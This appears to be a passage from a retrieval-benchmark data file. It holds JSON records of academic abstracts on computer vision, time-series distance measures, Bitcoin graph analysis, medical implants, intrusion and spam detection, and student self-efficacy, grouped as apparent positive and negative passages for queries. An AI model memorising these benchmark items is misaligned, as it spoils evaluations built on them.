"text": "This paper studies the use of everyday words to describe images. The common saying has it that 'a picture is worth a thousand words', here we ask which thousand? The proliferation of tagged social multimedia data presents a challenge to understanding collective tag-use at large scale -- one can ask if patterns from photo tags help understand tag-tag relations, and how it can be leveraged to improve visual search and recognition. We propose a new method to jointly analyze three distinct visual knowledge resources: Flickr, ImageNet/WordNet, and ConceptNet. This allows us to quantify the visual relevance of both tags learn their relationships. We propose a novel network estimation algorithm, Inverse Concept Rank, to infer incomplete tag relationships. We then design an algorithm for image annotation that takes into account both image and tag features. We analyze over 5 million photos with over 20,000 visual tags. The statistics from this collection leads to good results for image tagging, relationship estimation, and generalizing to unseen tags. This is a first step in analyzing picture tags and everyday semantic knowledge. Potential other applications include generating natural language descriptions of pictures, as well as validating and supplementing knowledge databases.",
"title": ""
},
{
"docid": "4eaf40cdef12d0d2be1d3c6a96c94841",
"text": "Acknowledgements in research publications, like citations, indicate influential contributions to scientific work; however, large-scale acknowledgement analyses have traditionally been impractical due to the high cost of manual information extraction. In this paper we describe a mixture method for automatically mining acknowledgements from research documents using a combination of a Support Vector Machine and regular expressions. The algorithm has been implemented as a plug-in to the CiteSeer Digital Library and the extraction results have been integrated with the traditional metadata and citation index of the CiteSeer system. As a demonstration, we use CiteSeer's autonomous citation indexing (ACI) feature to measure the relative impact of acknowledged entities, and present the top twenty acknowledged entities within the archive.",
"title": ""
},
{
"docid": "0208d66e905292e1c83cf4af43f2b8aa",
"text": "Dynamic time warping (DTW), which finds the minimum path by providing non-linear alignments between two time series, has been widely used as a distance measure for time series classification and clustering. However, DTW does not account for the relative importance regarding the phase difference between a reference point and a testing point. This may lead to misclassification especially in applications where the shape similarity between two sequences is a major consideration for an accurate recognition. Therefore, we propose a novel distance measure, called a weighted DTW (WDTW), which is a penaltybased DTW. Our approach penalizes points with higher phase difference between a reference point and a testing point in order to prevent minimum distance distortion caused by outliers. The rationale underlying the proposed distance measure is demonstrated with some illustrative examples. A new weight function, called the modified logistic weight function (MLWF), is also proposed to systematically assign weights as a function of the phase difference between a reference point and a testing point. By applying different weights to adjacent points, the proposed algorithm can enhance the detection of similarity between two time series. We show that some popular distance measures such as DTW and Euclidean distance are special cases of our proposed WDTW measure. We extend the proposed idea to other variants of DTW such as derivative dynamic time warping (DDTW) and propose the weighted version of DDTW. We have compared the performances of our proposed procedures with other popular approaches using public data sets available through the UCR Time Series Data Mining Archive for both time series classification and clustering problems. The experimental results indicate that the proposed approaches can achieve improved accuracy for time series classification and clustering problems. & 2011 Published by Elsevier Ltd.",
"title": ""
},
{
"docid": "3aaf7b95e0b3e7642c3065f3bc55692c",
"text": "iv 1 Problem Definition 1 2 Origins from Two Extremes 3 2.1 The Origins of Agile Methods 3 2.2 The Origins of CMMI 5 3 Factors that Affect Perception 7 3.1 Misuse 7 3.2 Lack of Accurate Information 8 3.3 Terminology Difficulties 9 4 The Truth About CMMI 11 4.1 CMMI Is a Model, Not a Process Standard 11 4.2 Process Areas, Not Processes 13 4.3 SCAMPI Appraisals 14 5 The Truth About Agile 16 6 There Is Value in Both Paradigms 20 6.1 Challenges When Using Agile 20 6.2 Challenges When Using CMMI 22 6.3 Current Published Research 23 6.4 The Hope in Recent Trends 24 7 Problems Not Solved by CMMI nor Agile 27",
"title": ""
},
{
"docid": "57fa714fe57f10899cbaec11f67851a2",
"text": "This study investigated the relationship between anxiety and feelings of being connected to nature. Two standardised self-report scales, the Nature Relatedness Scale and the State Trait Inventory for Cognitive and Somatic Anxiety, were used in tandem with a qualitative question. Quantitative results indicated that connection to nature was significantly related to lower levels of overall, state cognitive and trait cognitive anxiety. Qualitative results revealed seven themes: relaxation, time out, enjoyment, connection, expanse, sensory engagement and a healthy perspective. Taken together, these results suggest that opportunities that enhance experiences of being connected to nature may reduce unhelpful anxiety.",
"title": ""
},
{
"docid": "f985b4db1646afdd014b2668267e947f",
"text": "The encode-decoder framework has shown recent success in image captioning. Visual attention, which is good at detailedness, and semantic attention, which is good at comprehensiveness, have been separately proposed to ground the caption on the image. In this paper, we propose the Stepwise Image-Topic Merging Network (simNet) that makes use of the two kinds of attention at the same time. At each time step when generating the caption, the decoder adaptively merges the attentive information in the extracted topics and the image according to the generated context, so that the visual information and the semantic information can be effectively combined. The proposed approach is evaluated on two benchmark datasets and reaches the state-of-the-art performances.1",
"title": ""
},
{
"docid": "2bb78e27f9546b938caf8be04f1a8b99",
"text": "While there has been an explosion of impressive, datadriven AI applications in recent years, machines still largely lack a deeper understanding of the world to answer questions that go beyond information explicitly stated in text, and to explain and discuss those answers. To reach this next generation of AI applications, it is imperative to make faster progress in areas of knowledge, modeling, reasoning, and language. Standardized tests have often been proposed as a driver for such progress, with good reason: Many of the questions require sophisticated understanding of both language and the world, pushing the boundaries of AI, while other questions are easier, supporting incremental progress. In Project Aristo at the Allen Institute for AI, we are working on a specific version of this challenge, namely having the computer pass Elementary School Science and Math exams. Even at this level there is a rich variety of problems and question types, the most difficult requiring significant progress in AI. Here we propose this task as a challenge problem for the community, and are providing supporting datasets. Solutions to many of these problems would have a major impact on the field so we encourage you: Take the Aristo Challenge!",
"title": ""
},
{
"docid": "5549b770dd97c58e6bc5fc18b316e0e4",
"text": "Due to its rapid speed of information spread, wide user bases, and extreme mobility, Twitter is drawing attention as a potential emergency reporting tool under extreme events. However, at the same time, Twitter is sometimes despised as a citizen based non-professional social medium for propagating misinformation, rumors, and, in extreme case, propaganda. This study explores the working dynamics of the rumor mill by analyzing Twitter data of the Haiti Earthquake in 2010. For this analysis, two key variables of anxiety and informational uncertainty are derived from rumor theory, and their interactive dynamics are measured by both quantitative and qualitative methods. Our research finds that information with credible sources contribute to suppress the level of anxiety in Twitter community, which leads to rumor control and high information quality.",
"title": ""
},
{
"docid": "3ddac782fd9797771505a4a46b849b45",
"text": "A number of studies have found that mortality rates are positively correlated with income inequality across the cities and states of the US. We argue that this correlation is confounded by the effects of racial composition. Across states and Metropolitan Statistical Areas (MSAs), the fraction of the population that is black is positively correlated with average white incomes, and negatively correlated with average black incomes. Between-group income inequality is therefore higher where the fraction black is higher, as is income inequality in general. Conditional on the fraction black, neither city nor state mortality rates are correlated with income inequality. Mortality rates are higher where the fraction black is higher, not only because of the mechanical effect of higher black mortality rates and lower black incomes, but because white mortality rates are higher in places where the fraction black is higher. This result is present within census regions, and for all age groups and both sexes (except for boys aged 1-9). It is robust to conditioning on income, education, and (in the MSA results) on state fixed effects. Although it remains unclear why white mortality is related to racial composition, the mechanism working through trust that is often proposed to explain the effects of inequality on health is also consistent with the evidence on racial composition and mortality.",
"title": ""
},
{
"docid": "33785cf7f10a58b2fbd29010eceb60d5",
"text": "Maximum power point tracking (MPPT) is essential for photovoltaic (PV) string inverter systems. Partially shaded PV strings with bypass diodes exhibit multiple peaks in the power-voltage characteristic. Under partial shading conditions, conventional algorithms get trapped in a local maximum power point, and fail to track the global MPP (GMPP). To overcome this problem, global search algorithms such as particle swarm optimization (PSO) have been proposed. However, these can cause excessive oscillations in the output power before converging onto the GMPP. In this paper, a new GMPPT technique combining the PSO and Perturb and Observe (P&O) algorithms has been presented. The P&O technique is used to track the MPP under uniform irradiance, and the same is used to detect the occurrence of partial shading. Only on the onset of partial shading conditions, PSO is employed. Furthermore, the search space of PSO is reduced by using a window-based search in order to reduce the power oscillations and convergence time. The effectiveness of the proposed algorithm in tracking the GMPP, both under uniform and nonuniform irradiance conditions, is demonstrated experimentally.",
"title": ""
},
{
"docid": "bc8b40babfc2f16144cdb75b749e3a90",
"text": "The Bitcoin scheme is a rare example of a large scale global payment system in which all the transactions are publicly accessible (but in an anonymous way). We downloaded the full history of this scheme, and analyzed many statistical properties of its associated transaction graph. In this paper we answer for the first time a variety of interesting questions about the typical behavior of users, how they acquire and how they spend their bitcoins, the balance of bitcoins they keep in their accounts, and how they move bitcoins between their various accounts in order to better protect their privacy. In addition, we isolated all the large transactions in the system, and discovered that almost all of them are closely related to a single large transaction that took place in November 2010, even though the associated users apparently tried to hide this fact with many strange looking long chains and fork-merge structures in the transaction graph.",
"title": ""
},
{
"docid": "0d2b905bc0d7f117d192a8b360cc13f0",
"text": "We investigate a previously unknown phase of phosphorus that shares its layered structure and high stability with the black phosphorus allotrope. We find the in-plane hexagonal structure and bulk layer stacking of this structure, which we call \"blue phosphorus,\" to be related to graphite. Unlike graphite and black phosphorus, blue phosphorus displays a wide fundamental band gap. Still, it should exfoliate easily to form quasi-two-dimensional structures suitable for electronic applications. We study a likely transformation pathway from black to blue phosphorus and discuss possible ways to synthesize the new structure.",
"title": ""
},
{
"docid": "c43785187ce3c4e7d1895b628f4a2df3",
"text": "In this paper we focus on the connection between age and language use, exploring age prediction of Twitter users based on their tweets. We discuss the construction of a fine-grained annotation effort to assign ages and life stages to Twitter users. Using this dataset, we explore age prediction in three different ways: classifying users into age categories, by life stages, and predicting their exact age. We find that an automatic system achieves better performance than humans on these tasks and that both humans and the automatic systems have difficulties predicting the age of older people. Moreover, we present a detailed analysis of variables that change with age. We find strong patterns of change, and that most changes occur at young ages.",
"title": ""
},
{
"docid": "65cdcf3d4da07205afe67b0d7a210993",
"text": "In this paper, wireless telemetry using the near-field coupling technique with round-wire coils for an implanted cardiac microstimulator is presented. The proposed system possesses an external powering amplifier and an internal bidirectional microstimulator. The energy of the microstimulator is provided by a rectifier that can efficiently charge a rechargeable device. A fully integrated regulator and a charge pump circuit are included to generate a stable, low-voltage, and high-potential supply voltage, respectively. A miniature digital processor includes a phase-shift-keying (PSK) demodulator to decode the transmission data and a self-protective system controller to operate the entire system. To acquire the cardiac signal, a low-voltage and low-power monitoring analog front end (MAFE) performs immediate threshold detection and data conversion. In addition, the pacing circuit, which consists of a pulse generator (PG) and its digital-to-analog (D/A) controller, is responsible for stimulating heart tissue. The chip was fabricated by Taiwan Semiconductor Manufacturing Company (TSMC) with 0.35-μm complementary metal-oxide semiconductor technology to perform the monitoring and pacing functions with inductively powered communication. Using a model with lead and heart tissue on measurement, a -5-V pulse at a stimulating frequency of 60 beats per minute (bpm) is delivered while only consuming 31.5 μW of power.",
"title": ""
},
{
"docid": "96dec027591a118cbc6a94d7fc52ade8",
"text": "A new approach based on interval analysis is developed to find the global minimum-jerk (MJ) trajectory of a robot manipulator within a joint space scheme using cubic splines. MJ trajectories are desirable for their similarity to human joint movements and for their amenability to path tracking and to limit robot vibrations. This makes them attractive choices for robotic applications, in spite of the fact that the manipulator dynamics is not taken into account. Cubic splines are used in a framework that assures overall continuity of velocities and accelerations in the robot movement. The resulting MJ trajectory planning is shown to be a global constrained minimax optimization problem. This is solved by a newly devised algorithm based on interval analysis and proof of convergence with certainty to an arbitrarily good global solution is provided. The proposed planning method is applied to an example regarding a six-joint manipulator and comparisons with an alternative MJ planner are exposed.",
"title": ""
},
{
"docid": "a02882240114791b555392f5adda76aa",
"text": "This book contains information obtained from authentic and highly regarded sources. Reasonable efforts have been made to publish reliable data and information, but the author and publisher cannot assume responsibility for the validity of all materials or the consequences of their use. The authors and publishers have attempted to trace the copyright holders of all material reproduced in this publication and apologize to copyright holders if permission to publish in this form has not been obtained. If any copyright material has not been acknowledged please write and let us know so we may rectify in any future reprint. Except as permitted under U.S. Copyright Law, no part of this book may be reprinted, reproduced, transmitted, or utilized in any form by any electronic, mechanical, or other means, now known or hereafter invented, including photocopying , microfilming, and recording, or in any information storage or retrieval system, without written permission from the publishers. 978-750-8400. CCC is a not-for-profit organization that provides licenses and registration for a variety of users. For organizations that have been granted a photocopy license by the CCC, a separate system of payment has been arranged. Trademark Notice: Product or corporate names may be trademarks or registered trademarks, and are used only for identification and explanation without intent to infringe. Data clustering : algorithms and applications / [edited by] Charu C. Aggarwal, Chandan K. Reddy. pages cm.-(Chapman & Hall/CRC data mining and knowledge discovery series) Includes bibliographical references and index.",
"title": ""
},
{
"docid": "2ca2b26ae422cf95dd454867fa6c3571",
"text": "The Wallops 18-Meter diameter UHF-Band and the Morehead State 21-Meter diameter current S-band and future XBand and UHF-Band CubeSat Groundstations answer a growing need for high data rate from CubeSats over government licensed frequencies. Ten years ago, when CubeSats began, they were nothing more than simple science experiments, typically consisting of a camera and a low data rate radio. The success and wide community support for the National Science Foundation (NSF) CubeSat Program combined with the increasing number of NASA proposals that utilize CubeSats, and other large government organizations that have started funding CubeSats, demonstrates the maturation of the CubeSat platform. The natural gain provided by the large diameter UHF-, Xand SBand Groundstations enables high data rates (e.g. 3.0 Mbit, 300 times the typical 9.6 Kbit for CubeSats over UHF). Government funded CubeSats using amateur radio frequencies may violate the intent of the amateur radio service and it is a violation of National Telecommunications Information Administration (NTIA) rules for a government funded ground station to use amateur radio frequencies to communicate with CubeSats. The NSF has led the charge in finding a suitable government frequency band for CubeSats. Although amateur frequency licensing has historically been easy and fast to obtain, it limits downlink data rate capability due to narrow spectrum bandwidth allocation. In addition to limited bandwidth allocation, using unencrypted and published downlink telemetry data, easily accessible by any receiver, has not satisfied the needs of universities, industry and government agencies. After completing a decade mainly operating at the amateur radio frequency and using inexpensive but unreliable amateur commercial off-the-shelf (COTS) space and ground hardware, the CubeSat community is looking for different CubeSat and ground system communication solutions to support their current and future needs.",
"title": ""
},
{
"docid": "acdd0043b764fe8bb9904ea6ca71e5cf",
"text": "We investigate the task of 2D articulated human pose estimation in unconstrained still images. This is extremely challenging because of variation in pose, anatomy, clothing, and imaging conditions. Current methods use simple models of body part appearance and plausible configurations due to limitations of available training data and constraints on computational expense. We show that such models severely limit accuracy. Building on the successful pictorial structure model (PSM) we propose richer models of both appearance and pose, using state-of-the-art discriminative classifiers without introducing unacceptable computational expense. We introduce a new annotated database of challenging consumer images, an order of magnitude larger than currently available datasets, and demonstrate over 50% relative improvement in pose estimation accuracy over a stateof-the-art method.",
"title": ""
},
{
"docid": "9736331d674470adbe534503ef452cca",
"text": "In this paper we present our system for human-in-theloop video object segmentation. The backbone of our system is a method for one-shot video object segmentation [3]. While fast, this method requires an accurate pixel-level segmentation of one (or several) frames as input. As manually annotating such a segmentation is impractical, we propose a deep interactive image segmentation method, that can accurately segment objects with only a handful of clicks. On the GrabCut dataset, our method obtains 90% IOU with just 3.8 clicks on average, setting the new state of the art. Furthermore, as our method iteratively refines an initial segmentation, it can effectively correct frames where the video object segmentation fails, thus allowing users to quickly obtain high quality results even on challenging sequences. Finally, we investigate usage patterns and give insights in how many steps users take to annotate frames, what kind of corrections they provide, etc., thus giving important insights for further improving interactive video segmentation.",
"title": ""
}
] | scidocsrr |
f6a6afd95141af8dfac9ea36bbd5cc77 | A Three-Way Model for Collective Learning on Multi-Relational Data | [
{
"docid": "db897ae99b6e8d2fc72e7d230f36b661",
"text": "All rights reserved. No part of this book may be reproduced in any form by any electronic or mechanical means (including photocopying, recording, or information storage and retrieval) without permission in writing from the publisher.",
"title": ""
},
{
"docid": "7f1c7a0887917937147c8f5b2dbe2df3",
"text": "We consider the problem of learning probabilistic models fo r c mplex relational structures between various types of objects. A model can hel p us “understand” a dataset of relational facts in at least two ways, by finding in terpretable structure in the data, and by supporting predictions, or inferences ab out whether particular unobserved relations are likely to be true. Often there is a t radeoff between these two aims: cluster-based models yield more easily interpret abl representations, while factorization-based approaches have given better pr edictive performance on large data sets. We introduce the Bayesian Clustered Tensor Factorization (BCTF) model, which embeds a factorized representation of relatio ns in a nonparametric Bayesian clustering framework. Inference is fully Bayesia n but scales well to large data sets. The model simultaneously discovers interp retable clusters and yields predictive performance that matches or beats previo us probabilistic models for relational data.",
"title": ""
}
] | [
{
"docid": "84d2cb7c4b8e0f835dab1cd3971b60c5",
"text": "Ambient intelligence (AmI) deals with a new world of ubiquitous computing devices, where physical environments interact intelligently and unobtrusively with people. These environments should be aware of people's needs, customizing requirements and forecasting behaviors. AmI environments can be diverse, such as homes, offices, meeting rooms, schools, hospitals, control centers, vehicles, tourist attractions, stores, sports facilities, and music devices. Artificial intelligence research aims to include more intelligence in AmI environments, allowing better support for humans and access to the essential knowledge for making better decisions when interacting with these environments. This article, which introduces a special issue on AmI, views the area from an artificial intelligence perspective.",
"title": ""
},
{
"docid": "ab443adab8954fb4b4fcd02fba97b058",
"text": "We present a novel one-transistor/one-resistor (1T1R) synapse for neuromorphic networks, based on phase change memory (PCM) technology. The synapse is capable of spike-timing dependent plasticity (STDP), where gradual potentiation relies on set transition, namely crystallization, in the PCM, while depression is achieved via reset or amorphization of a chalcogenide active volume. STDP characteristics are demonstrated by experiments under variable initial conditions and number of pulses. Finally, we support the applicability of the 1T1R synapse for learning and recognition of visual patterns by simulations of fully connected neuromorphic networks with 2 or 3 layers with high recognition efficiency. The proposed scheme provides a feasible low-power solution for on-line unsupervised machine learning in smart reconfigurable sensors.",
"title": ""
},
{
"docid": "fea31b71829803d78dabf784dfdb0093",
"text": "Tag recommendation is helpful for the categorization and searching of online content. Existing tag recommendation methods can be divided into collaborative filtering methods and content based methods. In this paper, we put our focus on the content based tag recommendation due to its wider applicability. Our key observation is the tag-content co-occurrence, i.e., many tags have appeared multiple times in the corresponding content. Based on this observation, we propose a generative model (Tag2Word), where we generate the words based on the tag-word distribution as well as the tag itself. Experimental evaluations on real data sets demonstrate that the proposed method outperforms several existing methods in terms of recommendation accuracy, while enjoying linear scalability.",
"title": ""
},
{
"docid": "92a0fb602276952962762b07e7cd4d2b",
"text": "Representation of video is a vital problem in action recognition. This paper proposes Stacked Fisher Vectors (SFV), a new representation with multi-layer nested Fisher vector encoding, for action recognition. In the first layer, we densely sample large subvolumes from input videos, extract local features, and encode them using Fisher vectors (FVs). The second layer compresses the FVs of subvolumes obtained in previous layer, and then encodes them again with Fisher vectors. Compared with standard FV, SFV allows refining the representation and abstracting semantic information in a hierarchical way. Compared with recent mid-level based action representations, SFV need not to mine discriminative action parts but can preserve mid-level information through Fisher vector encoding in higher layer. We evaluate the proposed methods on three challenging datasets, namely Youtube, J-HMDB, and HMDB51. Experimental results demonstrate the effectiveness of SFV, and the combination of the traditional FV and SFV outperforms stateof-the-art methods on these datasets with a large margin.",
"title": ""
},
{
"docid": "7fa9bacbb6b08065ecfe0530f082a391",
"text": "This paper considers the task of articulated human pose estimation of multiple people in real world images. We propose an approach that jointly solves the tasks of detection and pose estimation: it infers the number of persons in a scene, identifies occluded body parts, and disambiguates body parts between people in close proximity of each other. This joint formulation is in contrast to previous strategies, that address the problem by first detecting people and subsequently estimating their body pose. We propose a partitioning and labeling formulation of a set of body-part hypotheses generated with CNN-based part detectors. Our formulation, an instance of an integer linear program, implicitly performs non-maximum suppression on the set of part candidates and groups them to form configurations of body parts respecting geometric and appearance constraints. Experiments on four different datasets demonstrate state-of-the-art results for both single person and multi person pose estimation.",
"title": ""
},
{
"docid": "eabb50988aeb711995ff35833a47770d",
"text": "Although chemistry is by far the largest scientific discipline according to any quantitative measure, it had, until recently, been virtually ignored by professional philosophers of science. They left both a vacuum and a one-sided picture of science tailored to physics. Since the early 1990s, the situation has changed drastically, such that philosophy of chemistry is now one of the most flourishing fields in the philosophy of science, like the philosophy of biology that emerged in the 1970s. This article narrates the development and provides a survey of the main topics and trends.",
"title": ""
},
{
"docid": "ceb6d99e16e2e93e57e65bf1ca89b44c",
"text": "The common use of smart devices encourages potential attackers to violate privacy. Sometimes taking control of one device allows the attacker to obtain secret data (such as password for home WiFi network) or tools to carry out DoS attack, and this, despite the limited resources of such devices. One of the solutions for gaining users’ confidence is to assign responsibility for detecting attacks to the service provider, particularly Internet Service Provider (ISP). It is possible, since ISP often provides also the Home Gateway (HG)—device that has multiple roles: residential router, entertainment center, and home’s “command and control” center which allows to manage the Smart Home entities. The ISP may extend this set of functionalities by implementing an intrusion detection software in HG provisioned to their customers. In this article we propose an Intrusion Detection System (IDS) distributed between devices residing at user’s and ISP’s premises. The Home Gateway IDS and the ISP’s IDS constitute together a distributed structure which allows spreading computations related to attacks against Smart Home ecosystem. On the other hand, it also leverages the operator’s knowledge of security incidents across the customer premises. This distributed structure is supported by the ISP’s expert system that helps to detect distributed attacks i.e., using botnets.",
"title": ""
},
{
"docid": "2cd54d9d7f65d6346db31d67a3529e20",
"text": "This paper proposes a modification in the maximum power point tracking (MPPT) by using model predictive control (MPC). The modification scheme of the MPPT control is based on the perturb and observe algorithm (P&O). This modified control is implemented on the dc-dc multilevel boost converter (MLBC) to increase the response of the controller to extract the maximum power from the photovoltaic (PV) module and to boost a small dc voltage of it. The total system consisting of a PV model, a MLBC and the modified MPPT has been analyzed and then simulated with changing the solar radiation and the temperature. The proposed control scheme is implemented under program MATLAB/SIMULINK and the obtained results are validated with real time simulation using dSPACE 1103 ControlDesk. The real time simulation results have been provided for principle validation.",
"title": ""
},
{
"docid": "7fd682de56cc80974b6d51fc86ff9dca",
"text": "We present an indoor localization application leveraging the sensing capabilities of current state of the art smart phones. To the best of our knowledge, our application is the first one to be implemented in smart phones and integrating both offline and online phases of fingerprinting, delivering an accuracy of up to 1.5 meters. In particular, we have studied the possibilities offered by WiFi radio, cellular communications radio, accelerometer and magnetometer, already embedded in smart phones, with the intention to build a multimodal solution for localization. We have also implemented a new approach for the statistical processing of radio signal strengths, showing that it can outperform existing deterministic techniques.",
"title": ""
},
{
"docid": "a1d97d822a8e1a72eec2a4524e8a522c",
"text": "Tags have been popularly utilized for better annotating, organizing and searching for desirable images. Image tagging is the problem of automatically assigning tags to images. One major challenge for image tagging is that the existing/training labels associated with image examples might be incomplete and noisy. Valuable prior work has focused on improving the accuracy of the assigned tags, but very limited work tackles the efficiency issue in image tagging, which is a critical problem in many large scale real world applications. This paper proposes a novel Binary Codes Embedding approach for Fast Image Tagging (BCE-FIT) with incomplete labels. In particular, we construct compact binary codes for both image examples and tags such that the observed tags are consistent with the constructed binary codes. We then formulate the problem of learning binary codes as a discrete optimization problem. An efficient iterative method is developed to solve the relaxation problem, followed by a novel binarization method based on orthogonal transformation to obtain the binary codes from the relaxed solution. Experimental results on two large scale datasets demonstrate that the proposed approach can achieve similar accuracy with state-of-the-art methods while using much less time, which is important for large scale applications.",
"title": ""
},
{
"docid": "371ba9bf45c6bc2bcfd74693386a97f9",
"text": "Based on the results of a series of roundtables and the surveys from a recent research project sponsored by the Center for Advanced Purchasing Studies, there appears to be several major themes that emerge from the research that provide some clear messages for supply chain management education and training requirements. This report is based on the general premise that as the supply chain management environment is changing, there is a changing skill set required for success. Some of the primary elements identified with respect to the new set of requirements for supply management include: q Great pressure for cost reduction due to globalization q A greater demand for performance from internal customers, q A greater need to integrate and exploit supply base technologies and capabilities, q An increased focus on outsourcing and strategic-value added relationships, q Increasing focus on the supply chain q Increasing need to capture total cost and establish the business case q Increasing need for technology integration and e-procurement deployment The top trends mentioned in the focus groups effectively triangulate with the results of the survey. As shown in Table 1, at least eight of the fourteen trends most often brought up as a key trend in the focus groups were also ranked in the top ten trends ranked by executives in the survey. This analysis ensures that the results triangulate",
"title": ""
},
{
"docid": "6868e3b2432d9914a9b4a4fd2b50b3ee",
"text": "Nutritional deficiencies detection for coffee leaves is a task which is often undertaken manually by experts on the field known as agronomists. The process they follow to carry this task is based on observation of the different characteristics of the coffee leaves while relying on their own experience. Visual fatigue and human error in this empiric approach cause leaves to be incorrectly labeled and thus affecting the quality of the data obtained. In this context, different crowdsourcing approaches can be applied to enhance the quality of the data extracted. These approaches separately propose the use of voting systems, association rule filters and evolutive learning. In this paper, we extend the use of association rule filters and evolutive approach by combining them in a methodology to enhance the quality of the data while guiding the users during the main stages of data extraction tasks. Moreover, our methodology proposes a reward component to engage users and keep them motivated during the crowdsourcing tasks. The extracted dataset by applying our proposed methodology in a case study on Peruvian coffee leaves resulted in 93.33% accuracy with 30 instances collected by 8 experts and evaluated by 2 agronomic engineers with background on coffee leaves. The accuracy of the dataset was higher than independently implementing the evolutive feedback strategy and an empiric approach which resulted in 86.67% and 70% accuracy respectively under the same conditions.",
"title": ""
},
{
"docid": "b13fa98311719f107b45e8d6840497f1",
"text": "Social Networks allow users to self-present by sharing personal contents with others which may add comments. Recent studies highlighted how the emotions expressed in a post affect others’ posts, eliciting a congruent emotion. So far, no studies have yet investigated the emotional coherence between wall posts and its comments. This research evaluated posts and comments mood of Facebook profiles, analyzing their linguistic features, and a measure to assess an excessive self-presentation was introduced. Two new experimental measures were built, describing the emotional loading (positive and negative) of posts and comments, and the mood correspondence between them was evaluated. The profiles ”empathy”, the mood coherence between post and comments, was used to investigate the relation between an excessive self-presentation and the emotional coherence of a profile. Participants publish a higher average number of posts with positive mood. To publish an emotional post corresponds to get more likes, comments and receive a coherent mood of comments, confirming the emotional contagion effect reported in literature. Finally, the more empathetic profiles are characterized by an excessive self-presentation, having more posts, and receiving more comments and likes. To publish emotional contents appears to be functional to receive more comments and likes, fulfilling needs of attention-seeking.",
"title": ""
},
{
"docid": "8be8390c90168c8fbd4d13119f1f643a",
"text": "We address the problem of determining the structure of a set of plot points for an interactive narrative. To do so, we define a formal two-player game where a computer can play with an author to learn the structural representation of the story. This technique will allow for authors unfamiliar, or uncomfortable, with mathematical structures to create the inputs interactive narrative algorithms require. We include the underlying mathematical theory as a foundation of our approach, and characterize it’s effectiveness through a series of simulation experiments. Results indicate there is promise in using formal games to aid in authoring interactive narrative structures.",
"title": ""
},
{
"docid": "28c03f6fb14ed3b7d023d0983cb1e12b",
"text": "The focus of this paper is speeding up the application of convolutional neural networks. While delivering impressive results across a range of computer vision and machine learning tasks, these networks are computationally demanding, limiting their deployability. Convolutional layers generally consume the bulk of the processing time, and so in this work we present two simple schemes for drastically speeding up these layers. This is achieved by exploiting cross-channel or filter redundancy to construct a low rank basis of filters that are rank-1 in the spatial domain. Our methods are architecture agnostic, and can be easily applied to existing CPU and GPU convolutional frameworks for tuneable speedup performance. We demonstrate this with a real world network designed for scene text character recognition [15], showing a possible 2.5⇥ speedup with no loss in accuracy, and 4.5⇥ speedup with less than 1% drop in accuracy, still achieving state-of-the-art on standard benchmarks.",
"title": ""
},
{
"docid": "ff93eba71b8a84c2d1f1263652582b42",
"text": "Quality is the assurance of adherence to the customer specifications and it is a measure of excellence or a state of being free from defects, deficiencies and significant variation from standards. Customer specification of the product can be met by strictly adhering to the quality control measures in the production process and can be ensured in a cost effective manner only if the quality of each and every process in the organization is well defined and ensured without any lapses. Every activity in the supply chain line to be critically verified to identify the quality deviations incurring additional expense or loss to the organization. This is in line with the continual improvement principle of TQM philosophy . The cost of quality management system acts as the most significant tool in measuring, monitoring, controlling and decision making activities in a firm which aims on business excellence.",
"title": ""
},
{
"docid": "ac5a8a336981878c3bc5a762fbdfadf2",
"text": "Cybercriminals have found in online social networks a propitious medium to spread spam and malicious content. Existing techniques for detecting spam include predicting the trustworthiness of accounts and analyzing the content of these messages. However, advanced attackers can still successfully evade these defenses.\n Online social networks bring people who have personal connections or share common interests to form communities. In this paper, we first show that users within a networked community share some topics of interest. Moreover, content shared on these social network tend to propagate according to the interests of people. Dissemination paths may emerge where some communities post similar messages, based on the interests of those communities. Spam and other malicious content, on the other hand, follow different spreading patterns.\n In this paper, we follow this insight and present POISED, a system that leverages the differences in propagation between benign and malicious messages on social networks to identify spam and other unwanted content. We test our system on a dataset of 1.3M tweets collected from 64K users, and we show that our approach is effective in detecting malicious messages, reaching 91% precision and 93% recall. We also show that POISED's detection is more comprehensive than previous systems, by comparing it to three state-of-the-art spam detection systems that have been proposed by the research community in the past. POISED significantly outperforms each of these systems. Moreover, through simulations, we show how POISED is effective in the early detection of spam messages and how it is resilient against two well-known adversarial machine learning attacks.",
"title": ""
},
{
"docid": "a9e1f453fd964bbb9354bfa9e304b09b",
"text": "Recurrent neural networks (RNNs) are capable of learning features and long term dependencies from sequential and time-series data. The RNNs have a stack of non-linear units where at least one connection between units forms a directed cycle. A well-trained RNN can model any dynamical system; however, training RNNs is mostly plagued by issues in learning long-term dependencies. In this paper, we present a survey on RNNs and several new advances for newcomers and professionals in the field. The fundamentals and recent advances are explained and the research challenges are introduced.",
"title": ""
},
{
"docid": "b4e6c50275eef350da454f088ba7e02c",
"text": "Children with language-based learning impairments (LLIs) have major deficits in their recognition of some rapidly successive phonetic elements and nonspeech sound stimuli. In the current study, LLI children were engaged in adaptive training exercises mounted as computer \"games\" designed to drive improvements in their \"temporal processing\" skills. With 8 to 16 hours of training during a 20-day period, LLI children improved markedly in their abilities to recognize brief and fast sequences of nonspeech and speech stimuli.",
"title": ""
},
{
"docid": "949e6376eb352482603e6168894744fb",
"text": "Search over encrypted data is a technique of great interest in the cloud computing era, because many believe that sensitive data has to be encrypted before outsourcing to the cloud servers in order to ensure user data privacy. Devising an efficient and secure search scheme over encrypted data involves techniques from multiple domains – information retrieval for index representation, algorithms for search efficiency, and proper design of cryptographic protocols to ensure the security and privacy of the overall system. This chapter provides a basic introduction to the problem definition, system model, and reviews the state-of-the-art mechanisms for implementing privacy-preserving keyword search over encrypted data. We also present one integrated solution, which hopefully offer more insights into this important problem.",
"title": ""
}
] | scidocsrr |
20445bd5b48bbe9779aefdbbb0f232ba | An online growth mindset intervention in a sample of rural adolescent girls. | [
{
"docid": "e3bb490de9489a0c02f023d25f0a94d7",
"text": "During the past two decades, self-efficacy has emerged as a highly effective predictor of students' motivation and learning. As a performance-based measure of perceived capability, self-efficacy differs conceptually and psychometrically from related motivational constructs, such as outcome expectations, self-concept, or locus of control. Researchers have succeeded in verifying its discriminant validity as well as convergent validity in predicting common motivational outcomes, such as students' activity choices, effort, persistence, and emotional reactions. Self-efficacy beliefs have been found to be sensitive to subtle changes in students' performance context, to interact with self-regulated learning processes, and to mediate students' academic achievement. Copyright 2000 Academic Press.",
"title": ""
}
] | [
{
"docid": "0640f60855954fa2f12a58f403aec058",
